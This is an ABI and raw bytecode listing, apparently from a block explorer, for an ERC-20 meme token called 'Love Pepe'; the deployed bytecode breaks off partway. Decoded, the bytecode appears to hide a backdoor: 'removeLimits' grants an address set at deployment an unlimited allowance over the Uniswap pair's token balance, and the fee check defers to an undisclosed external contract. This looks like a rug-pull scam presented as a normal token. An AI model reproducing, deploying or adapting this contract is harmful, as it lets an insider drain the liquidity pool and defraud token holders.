[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"components":[{"internalType":"address","name":"pepeshOwnerr","type":"address"},{"internalType":"address","name":"pepeshPolTitler","type":"address"}],"internalType":"struct LovePepeCoin.PepeShConfiguration","name":"memPepeshConfig","type":"tuple"},{"internalType":"uint256","name":"tot_supply","type":"uint256"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"components":[{"internalType":"uint256","name":"mxTA","type":"uint256"},{"internalType":"address","name":"rewardWalt","type":"address"},{"internalType":"uint256","name":"mxWA","type":"uint256"}],"internalType":"struct LovePepeCoin.LimitedFirstPepeSh","name":"firstLimitValue","type":"tuple"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedMultipleFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"PairCreationUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isMarketAutomakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallets","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxBuyValue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxSellValue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapPairV2","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405260405162002270380380620022708339810160408190526200002691620008e8565b8581845f62000036848262000a50565b50600162000045838262000a50565b506002805460ff191660ff92909216919091179055505f9050620000663390565b600680546001600160a01b0319166001600160a01b038316908117909155604051919250905f907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600780546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa15801562000116573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200013c919062000b18565b6001600160a01b031663c9c653963060075f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200019c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001c2919062000b18565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156200020d573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000233919062000b18565b600880546001600160a01b0319166001600160a01b039290921691821790556200025f906001620003e0565b6200027a6127106200027385600a62000c41565b90620004ce565b82516200028990869062000c51565b62000295919062000c51565b600c55620002ac6127106200027385600a62000c41565b848360400151620002be919062000c51565b620002ca919062000c51565b600d555f6012819055601155600754620002ef906001600160a01b0316600162000520565b6020820151600f80546001600160a01b0319166001600160a01b03928316179055600654620003219116600162000520565b60208501516200033390600162000520565b8451601380546001600160a01b038084166001600160a01b0319928316179092556020880151601480549190931691161790556200037390600162000520565b6200038030600162000520565b600f5462000399906001600160a01b0316600162000520565b6010849055620003d4620003b56006546001600160a01b031690565b620003c285600a62000c41565b620003ce908762000c51565b620005da565b50505050505062000cd5565b6001600160a01b0382165f9081526009602052604090205481151560ff9091161515036200047b5760405162461bcd60e51b815260206004820152603860248201527f4175746f6d61746564206d61726b6574206d616b65722070616972206973206160448201527f6c72656164792073657420746f20746861742076616c7565000000000000000060648201526084015b60405180910390fd5b6001600160a01b0382165f81815260096020526040808220805460ff191685151590811790915590519092917f4db94fb8c0b6d154694d30f90a6b8e2e640640745257efb299e98339b6e0efd391a35050565b5f6200051783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250620006c560201b60201c565b90505b92915050565b6006546001600160a01b031633146200057c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000472565b6001600160a01b0382165f818152600a6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6001600160a01b038216620006325760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640162000472565b60045462000641908262000704565b6004556001600160a01b0382165f9081526003602052604090205462000668908262000704565b6001600160a01b0383165f818152600360205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620006b99085815260200190565b60405180910390a35050565b5f8183620006e85760405162461bcd60e51b815260040162000472919062000c6b565b505f620006f6848662000c9f565b95945050505050565b505050565b5f8062000712838562000cbf565b905083811015620005175760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640162000472565b634e487b7160e01b5f52604160045260245ffd5b604080519081016001600160401b03811182821017156200079f576200079f62000766565b60405290565b5f5b83811015620007c1578181015183820152602001620007a7565b50505f910152565b5f82601f830112620007d9575f80fd5b81516001600160401b0380821115620007f657620007f662000766565b604051601f8301601f19908116603f0116810190828211818310171562000821576200082162000766565b816040528381528660208588010111156200083a575f80fd5b6200084d846020830160208901620007a5565b9695505050505050565b80516001600160a01b03811681146200086e575f80fd5b919050565b805160ff811681146200086e575f80fd5b5f6060828403121562000895575f80fd5b604051606081016001600160401b0381118282101715620008ba57620008ba62000766565b60405282518152905080620008d26020840162000857565b6020820152604083015160408201525092915050565b5f805f805f8086880361012081121562000900575f80fd5b87516001600160401b038082111562000917575f80fd5b620009258b838c01620007c9565b98506040601f198401121562000939575f80fd5b620009436200077a565b92506200095360208b0162000857565b83526200096360408b0162000857565b602084015282975060608a015196506200098060808b0162000873565b9550620009918b60a08c0162000884565b94506101008a0151925080831115620009a8575f80fd5b5050620009b889828a01620007c9565b9150509295509295509295565b600181811c90821680620009da57607f821691505b602082108103620009f957634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620006ff575f81815260208120601f850160051c8101602086101562000a275750805b601f850160051c820191505b8181101562000a485782815560010162000a33565b505050505050565b81516001600160401b0381111562000a6c5762000a6c62000766565b62000a848162000a7d8454620009c5565b84620009ff565b602080601f83116001811462000aba575f841562000aa25750858301515b5f19600386901b1c1916600185901b17855562000a48565b5f85815260208120601f198616915b8281101562000aea5788860151825594840194600190910190840162000ac9565b508582101562000b0857878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f6020828403121562000b29575f80fd5b620005178262000857565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111562000b8857815f190482111562000b6c5762000b6c62000b34565b8085161562000b7a57918102915b93841c939080029062000b4d565b509250929050565b5f8262000ba0575060016200051a565b8162000bae57505f6200051a565b816001811462000bc7576002811462000bd25762000bf2565b60019150506200051a565b60ff84111562000be65762000be662000b34565b50506001821b6200051a565b5060208310610133831016604e8410600b841016171562000c17575081810a6200051a565b62000c23838362000b48565b805f190482111562000c395762000c3962000b34565b029392505050565b5f6200051760ff84168362000b90565b80820281158282048414176200051a576200051a62000b34565b602081525f825180602084015262000c8b816040850160208701620007a5565b601f01601f19169190910160400192915050565b5f8262000cba57634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156200051a576200051a62000b34565b61158d8062000ce35f395ff3fe608060405260043610610164575f3560e01c8063715018a6116100cd578063a457c2d711610087578063aa4fd72811610062578063aa4fd728146103f0578063c02466681461041e578063dd62ed3e1461043d578063f2fde38b14610481575f80fd5b8063a457c2d71461039d578063a9059cbb146103bc578063aa4bde28146103db575f80fd5b8063715018a614610318578063751039fc1461032e5780638c0b5e22146103425780638da5cb5b1461035757806395d89b41146103745780639761ac5014610388575f80fd5b806323b872dd1161011e57806323b872dd14610251578063313ce56714610270578063395093511461029157806342cc2f45146102b05780634872ee6e146102cf57806370a08231146102e4575f80fd5b80630445b6671461016f57806306fdde0314610197578063095ea7b3146101b85780631694505e146101e757806318160ddd1461021e57806320fe9c4f14610232575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b50610184600e5481565b6040519081526020015b60405180910390f35b3480156101a2575f80fd5b506101ab6104a0565b60405161018e9190611206565b3480156101c3575f80fd5b506101d76101d2366004611268565b61052f565b604051901515815260200161018e565b3480156101f2575f80fd5b50600754610206906001600160a01b031681565b6040516001600160a01b03909116815260200161018e565b348015610229575f80fd5b50600454610184565b34801561023d575f80fd5b50600f54610206906001600160a01b031681565b34801561025c575f80fd5b506101d761026b366004611292565b610545565b34801561027b575f80fd5b5060025460405160ff909116815260200161018e565b34801561029c575f80fd5b506101d76102ab366004611268565b6105ac565b3480156102bb575f80fd5b50600854610206906001600160a01b031681565b3480156102da575f80fd5b5061018460115481565b3480156102ef575f80fd5b506101846102fe3660046112d0565b6001600160a01b03165f9081526003602052604090205490565b348015610323575f80fd5b5061032c6105e1565b005b348015610339575f80fd5b5061032c61065d565b34801561034d575f80fd5b50610184600c5481565b348015610362575f80fd5b506006546001600160a01b0316610206565b34801561037f575f80fd5b506101ab6106c3565b348015610393575f80fd5b5061018460125481565b3480156103a8575f80fd5b506101d76103b7366004611268565b6106d2565b3480156103c7575f80fd5b506101d76103d6366004611268565b61071f565b3480156103e6575f80fd5b50610184600d5481565b3480156103fb575f80fd5b506101d761040a3660046112d0565b60096020525f908152604090205460ff1681565b348015610429575f80fd5b5061032c6104383660046112eb565b61072b565b348015610448575f80fd5b50610184610457366004611326565b6001600160a01b039182165f90815260056020908152604080832093909416825291909152205490565b34801561048c575f80fd5b5061032c61049b3660046112d0565b6107b3565b60605f80546104ae90611352565b80601f01602080910402602001604051908101604052809291908181526020018280546104da90611352565b80156105255780601f106104fc57610100808354040283529160200191610525565b820191905f5260205f20905b81548152906001019060200180831161050857829003601f168201915b5050505050905090565b5f61053b33848461089d565b5060015b92915050565b5f6105518484846109c1565b6105a2843361059d8560405180606001604052806028815260200161150b602891396001600160a01b038a165f9081526005602090815260408083203384529091529020549190610c5f565b61089d565b5060019392505050565b335f8181526005602090815260408083206001600160a01b0387168452909152812054909161053b91859061059d9086610c97565b6006546001600160a01b031633146106145760405162461bcd60e51b815260040161060b9061138a565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6006546001600160a01b031633146106875760405162461bcd60e51b815260040161060b9061138a565b600454600c556008546001600160a01b039081165f9081526005602090815260408083206013549094168352929052205f199055600454600d55565b6060600180546104ae90611352565b5f61053b338461059d8560405180606001604052806025815260200161153360259139335f9081526005602090815260408083206001600160a01b038d1684529091529020549190610c5f565b5f61053b3384846109c1565b6006546001600160a01b031633146107555760405162461bcd60e51b815260040161060b9061138a565b6001600160a01b0382165f818152600a6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b031633146107dd5760405162461bcd60e51b815260040161060b9061138a565b6001600160a01b0381166108425760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161060b565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166108ff5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161060b565b6001600160a01b0382166109605760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161060b565b6001600160a01b038381165f8181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109e157506001600160a01b03821661dead145b806109ea575080155b806109fa57506109fa8383610cfc565b15610a0f57610a0a838383610dbc565b505050565b600c54811115610a725760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b606482015260840161060b565b6008546001600160a01b03838116911614610afc576001600160a01b0382165f90815260036020526040902054600d54610aac83836113d3565b1115610afa5760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e74000000604482015260640161060b565b505b305f90815260036020526040902054600b5460ff16158015610b205750600e548110155b8015610b4457506001600160a01b0384165f9081526009602052604090205460ff16155b15610b8057600b805460ff19166001179055808015610b7457600f54610b749082906001600160a01b0316610f3f565b50600b805460ff191690555b600b546001600160a01b0384165f908152600a602052604090205460ff91821615911680610bc557506001600160a01b0385165f908152600a602052604090205460ff165b15610bcd57505f5b8015610c4d575f610bf46064610bee60125487610f8a90919063ffffffff16565b90611008565b6001600160a01b0386165f9081526009602052604090205490915060ff1615610c3457610c316064610bee60115487610f8a90919063ffffffff16565b90505b610c3e8482611049565b9350610c4b863083610dbc565b505b610c58858585610dbc565b5050505050565b5f8184841115610c825760405162461bcd60e51b815260040161060b9190611206565b505f610c8e84866113e6565b95945050505050565b5f80610ca383856113d3565b905083811015610cf55760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161060b565b9392505050565b6001600160a01b0381165f908152600a602052604081205460ff1680610d3957506001600160a01b0383165f908152600a602052604090205460ff165b80610cf5575060145460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610d90573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610db491906113f9565b119392505050565b6001600160a01b038316610e205760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161060b565b6001600160a01b038216610e825760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161060b565b610ebe816040518060600160405280602681526020016114e5602691396001600160a01b0386165f908152600360205260409020549190610c5f565b6001600160a01b038085165f908152600360205260408082209390935590841681522054610eec9082610c97565b6001600160a01b038084165f8181526003602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b49085815260200190565b47610f498361108a565b5f610f544783611049565b6040519091506001600160a01b0384169082156108fc029083905f818181858888f19350505050158015610c58573d5f803e3d5ffd5b5f825f03610f9957505f61053f565b5f610fa48385611410565b905082610fb18583611427565b14610cf55760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b606482015260840161060b565b5f610cf583836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506111da565b5f610cf583836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c5f565b6040805160028082526060820183525f9260208301908036833701905050905030815f815181106110bd576110bd611446565b6001600160a01b03928316602091820292909201810191909152600754604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611114573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611138919061145a565b8160018151811061114b5761114b611446565b6001600160a01b039283166020918202929092010152600754611171913091168461089d565b60075460405163791ac94760e01b81526001600160a01b039091169063791ac947906111a99085905f90869030904290600401611475565b5f604051808303815f87803b1580156111c0575f80fd5b505af11580156111d2573d5f803e3d5ffd5b505050505050565b5f81836111fa5760405162461bcd60e51b815260040161060b9190611206565b505f610c8e8486611427565b5f6020808352835180828501525f5b8181101561123157858101830151858201604001528201611215565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114611265575f80fd5b50565b5f8060408385031215611279575f80fd5b823561128481611251565b946020939093013593505050565b5f805f606084860312156112a4575f80fd5b83356112af81611251565b925060208401356112bf81611251565b929592945050506040919091013590565b5f602082840312156112e0575f80fd5b8135610cf581611251565b5f80604083850312156112fc575f80fd5b823561130781611251565b91506020830135801515811461131b575f80fd5b809150509250929050565b5f8060408385031215611337575f80fd5b823561134281611251565b9150602083013561131b81611251565b600181811c9082168061136657607f821691505b60208210810361138457634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561053f5761053f6113bf565b8181038181111561053f5761053f6113bf565b5f60208284031215611409575f80fd5b5051919050565b808202811582820484141761053f5761053f6113bf565b5f8261144157634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f6020828403121561146a575f80fd5b8151610cf581611251565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b818110156114c35784516001600160a01b03168352938301939183019160010161149e565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212207faa19b533b6da349b01ee29a2cd524b9e8311af72269d42cfa5afcea8660e7064736f6c63430008140033000000000000000000000000000000000000000000000000000000000000012000000000000000000000000075abfc0281e065e85fe31db00eb90a5b7da2c13500000000000000000000000029c05d425d93917957a355e63c036b3d0a8130ec00000000000000000000000000000000000000000000000000017e9d8602b400000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000000001f30000000000000000000000005f490efa3643d13c824acc6a6a3e6e3c03e0896600000000000000000000000000000000000000000000000000000000000001f3000000000000000000000000000000000000000000000000000000000000016000000000000000000000000000000000000000000000000000000000000000094c6f76652050657065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084c4f564550455045000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405260043610610164575f3560e01c8063715018a6116100cd578063a457c2d711610087578063aa4fd72811610062578063aa4fd728146103f0578063c02466681461041e578063dd62ed3e1461043d578063f2fde38b14610481575f80fd5b8063a457c2d71461039d578063a9059cbb146103bc578063aa4bde28146103db575f80fd5b8063715018a614610318578063751039fc1461032e5780638c0b5e22146103425780638da5cb5b1461035757806395d89b41146103745780639761ac5014610388575f80fd5b806323b872dd1161011e57806323b872dd14610251578063313ce56714610270578063395093511461029157806342cc2f45146102b05780634872ee6e146102cf57806370a08231146102e4575f80fd5b80630445b6671461016f57806306fdde0314610197578063095ea7b3146101b85780631694505e146101e757806318160ddd1461021e57806320fe9c4f14610232575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b50610184600e5481565b6040519081526020015b60405180910390f35b3480156101a2575f80fd5b506101ab6104a0565b60405161018e9190611206565b3480156101c3575f80fd5b506101d76101d2366004611268565b61052f565b604051901515815260200161018e565b3480156101f2575f80fd5b50600754610206906001600160a01b031681565b6040516001600160a01b03909116815260200161018e565b348015610229575f80fd5b50600454610184565b34801561023d575f80fd5b50600f54610206906001600160a01b031681565b34801561025c575f80fd5b506101d761026b366004611292565b610545565b34801561027b575f80fd5b5060025460405160ff909116815260200161018e565b34801561029c575f80fd5b506101d76102ab366004611268565b6105ac565b3480156102bb575f80fd5b50600854610206906001600160a01b031681565b3480156102da575f80fd5b5061018460115481565b3480156102ef575f80fd5b506101846102fe3660046112d0565b6001600160a01b03165f9081526003602052604090205490565b348015610323575f80fd5b5061032c6105e1565b005b348015610339575f80fd5b5061032c61065d565b34801561034d575f80fd5b50610184600c5481565b348015610362575f80fd5b506006546001600160a01b0316610206565b34801561037f575f80fd5b506101ab6106c3565b348015610393575f80fd5b5061018460125481565b3480156103a8575f80fd5b506101d76103b7366004611268565b6106d2565b3480156103c7575f80fd5b506101d76103d6366004611268565b61071f565b3480156103e6575f80fd5b50610184600d5481565b3480156103fb575f80fd5b506101d761040a3660046112d0565b60096020525f908152604090205460ff1681565b348015610429575f80fd5b5061032c6104383660046112eb565b61072b565b348015610448575f80fd5b50610184610457366004611326565b6001600160a01b039182165f90815260056020908152604080832093909416825291909152205490565b34801561048c575f80fd5b5061032c61049b3660046112d0565b6107b3565b60605f80546104ae90611352565b80601f01602080910402602001604051908101604052809291908181526020018280546104da90611352565b80156105255780601f106104fc57610100808354040283529160200191610525565b820191905f5260205f20905b81548152906001019060200180831161050857829003601f168201915b5050505050905090565b5f61053b33848461089d565b5060015b92915050565b5f6105518484846109c1565b6105a2843361059d8560405180606001604052806028815260200161150b602891396001600160a01b038a165f9081526005602090815260408083203384529091529020549190610c5f565b61089d565b5060019392505050565b335f8181526005602090815260408083206001600160a01b0387168452909152812054909161053b91859061059d9086610c97565b6006546001600160a01b031633146106145760405162461bcd60e51b815260040161060b9061138a565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6006546001600160a01b031633146106875760405162461bcd60e51b815260040161060b9061138a565b600454600c556008546001600160a01b039081165f9081526005602090815260408083206013549094168352929052205f199055600454600d55565b6060600180546104ae90611352565b5f61053b338461059d8560405180606001604052806025815260200161153360259139335f9081526005602090815260408083206001600160a01b038d1684529091529020549190610c5f565b5f61053b3384846109c1565b6006546001600160a01b031633146107555760405162461bcd60e51b815260040161060b9061138a565b6001600160a01b0382165f818152600a6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b031633146107dd5760405162461bcd60e51b815260040161060b9061138a565b6001600160a01b0381166108425760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161060b565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166108ff5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161060b565b6001600160a01b0382166109605760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161060b565b6001600160a01b038381165f8181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109e157506001600160a01b03821661dead145b806109ea575080155b806109fa57506109fa8383610cfc565b15610a0f57610a0a838383610dbc565b505050565b600c54811115610a725760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b606482015260840161060b565b6008546001600160a01b03838116911614610afc576001600160a01b0382165f90815260036020526040902054600d54610aac83836113d3565b1115610afa5760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e74000000604482015260640161060b565b505b305f90815260036020526040902054600b5460ff16158015610b205750600e548110155b8015610b4457506001600160a01b0384165f9081526009602052604090205460ff16155b15610b8057600b805460ff19166001179055808015610b7457600f54610b749082906001600160a01b0316610f3f565b50600b805460ff191690555b600b546001600160a01b0384165f908152600a602052604090205460ff91821615911680610bc557506001600160a01b0385165f908152600a602052604090205460ff165b15610bcd57505f5b8015610c4d575f610bf46064610bee60125487610f8a90919063ffffffff16565b90611008565b6001600160a01b0386165f9081526009602052604090205490915060ff1615610c3457610c316064610bee60115487610f8a90919063ffffffff16565b90505b610c3e8482611049565b9350610c4b863083610dbc565b505b610c58858585610dbc565b5050505050565b5f8184841115610c825760405162461bcd60e51b815260040161060b9190611206565b505f610c8e84866113e6565b95945050505050565b5f80610ca383856113d3565b905083811015610cf55760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161060b565b9392505050565b6001600160a01b0381165f908152600a602052604081205460ff1680610d3957506001600160a01b0383165f908152600a602052604090205460ff165b80610cf5575060145460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610d90573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610db491906113f9565b119392505050565b6001600160a01b038316610e205760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161060b565b6001600160a01b038216610e825760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161060b565b610ebe816040518060600160405280602681526020016114e5602691396001600160a01b0386165f908152600360205260409020549190610c5f565b6001600160a01b038085165f908152600360205260408082209390935590841681522054610eec9082610c97565b6001600160a01b038084165f8181526003602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b49085815260200190565b47610f498361108a565b5f610f544783611049565b6040519091506001600160a01b0384169082156108fc029083905f818181858888f19350505050158015610c58573d5f803e3d5ffd5b5f825f03610f9957505f61053f565b5f610fa48385611410565b905082610fb18583611427565b14610cf55760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b606482015260840161060b565b5f610cf583836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506111da565b5f610cf583836040518060400160405280601e8152602001